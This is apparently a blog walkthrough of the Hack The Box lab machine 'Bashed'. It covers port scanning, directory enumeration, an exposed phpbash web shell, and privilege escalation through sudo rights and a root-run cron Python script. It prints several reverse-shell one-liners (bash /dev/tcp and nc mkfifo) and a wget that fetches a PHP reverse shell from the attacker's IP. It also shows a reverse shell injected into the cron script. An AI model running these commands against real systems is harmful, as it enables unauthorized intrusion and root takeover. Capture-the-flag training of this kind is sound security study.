---
title: "HTB: Bashed"
date: 2021-08-07
classes: wide
categories:
  - Hackthebox
tag:
  - Web Enumeration  
  - phpbash
  - python reverse shell
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/bashed/bashed.png" alt="">

# Summary 

Bashed was an easy rated machine from hackthebox released in late 2017 that revolved around finding a phpbash script in /dev on a webserver that instantly gives you a semi interactive shell as www-data. From here I get a reverse shell to my terminal by using wget to download a php reverse shell to /tmp and execute it with php. From there I run sudo -l and see that www-data can run any command as scriptmanager, so i simply run bash as scriptmanager and get a shell as that user. Getting to root was quite simple and involved a python sciprt that root was executing in a crontab that scriptmanager has write permissions to, so I simply added a reverse shell in the python script and got a shell as root. So lets get into bashed from hackthebox

# Recon

```
$nmap -A -oN nmap/initial.txt $ip 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-07 09:37 BST
Nmap scan report for 10.10.10.68
Host is up (0.059s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.23 seconds
```

And then an all port scan

```
$nmap -p- -oN nmap/all-ports.txt --min-rate 10000 $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-07 09:39 BST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.065s latency).
Not shown: 61574 closed ports, 3960 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 29.75 seconds
```

# Enumeration of Services

## HTTP 80

Looking at the webserver it highlights phpbash which is a semi interactive web shell. 

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/bashed/1.png" alt="">

Running a gobuster on the webserver showsa few directories

```
$/home/purplerabbit/Documents/gobuster-linux-amd64/gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium.txt  -x txt                                                                    
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & purplerabbittian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2021/08/07 10:10:14 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]    
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]    
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]    
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]     
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/] 
```

# Shell as www-data

Looking over at /dev shows that there is phpbash.php 

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/bashed/2.png" alt="">

VIsiting phpbash.php I get a shell a www-data

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/bashed/3.png" alt="">

However I couldn't seem to get a reverse shell with netcat or bash one liner. 
```
/bin/bash -i >& /dev/tcp/10.10.16.91/4444 0>&1
```
and
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.91 4444 >/tmp/f
```

I wasn't able to wget a php reverse shell to the web server also because www-data didn't have write permissions. I was however able to download the php-reverse-shell.php file to /tmp and execute it with php.

```
www-data@bashed

:/tmp# wget http://10.10.16.91/php-reverse-shell.php

  
--2021-08-07 02:30:28-- http://10.10.16.91/php-reverse-shell.php  
Connecting to 10.10.16.91:80... connected.  
HTTP request sent, awaiting response... 200 OK  
Length: 5493 (5.4K) [application/octet-stream]  
Saving to: 'php-reverse-shell.php'

$ php php-reverse-shell.php


$nc -lvp 4444
listening on [any] 4444 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.16.91] from (UNKNOWN) [10.10.10.68] 48612
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 02:30:48 up 54 min,  0 users,  load average: 0.11, 0.16, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoai
/bin/sh: 1: whoai: not found
$ whoami
www-data
```

I then did the python tty trick to upgrade to a fully interactive shell

```
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@bashed:/$ ^Z
[1]+  Stopped                 nc -lvp 4444
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/bashed]
└──╼ $stty raw -echo
┌─[purplerabbit@kali]─[~/Documents/htb/bashed]
nc -lvp 4444
            ls
bin   etc         lib         media  proc  sbin     sys  var
boot  home        lib64       mnt    root  scripts  tmp  vmlinuz
dev   initrd.img  lost+found  opt    run   srv      usr
www-data@bashed:/$ 
```

From here I was able to read arrexel home directory and get user.txt

# www-data => scriptmanager

Running sudo -l on the system showed that www-data could run any command as scriptmanager

```
ww-data@bashed:/tmp$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```

So I then ran sudo with -u option with bash to enter a shell as scirptmanager

```
www-data@bashed:/tmp$ sudo -u scriptmanager bash  
scriptmanager@bashed:/tmp$ whoami
scriptmanager
```

# scriptmanager => root

Running linpeas showed that scriptmanager has permissions to write to a python script in /scripts. Looking into this file shows that it writes a file to /scripts 

```
$ cat /scripts/test.py 
f = open("test.txt", "w")                     
f.write("testing 123!")                    
f.close 
```

Looking at who owns test.txt shows that its owned by root meaning that root must be executing this script

```
scriptmanager@bashed:/scripts$ ls -la            
total 16                                 
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Aug  7 02:40 test.txt
```

I can confirm this by running pspy32 on the host system

```
2021/08/07 02:47:01 CMD: UID=0    PID=31480  | python test.py 
```

UID meaning that its being executed as root. 

I can then edit this python script to contain a reverse shell using the os library 

```
import os  
os.`system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.91 4444 >/tmp/f")`
```

After a few minutes I receive a reverse shell as root

```
$nc -lvp 4444
listening on [any] 4444 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.16.91] from (UNKNOWN) [10.10.10.68] 48618
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
```

That was bashed from hackthebox! Hope you enjoyed!
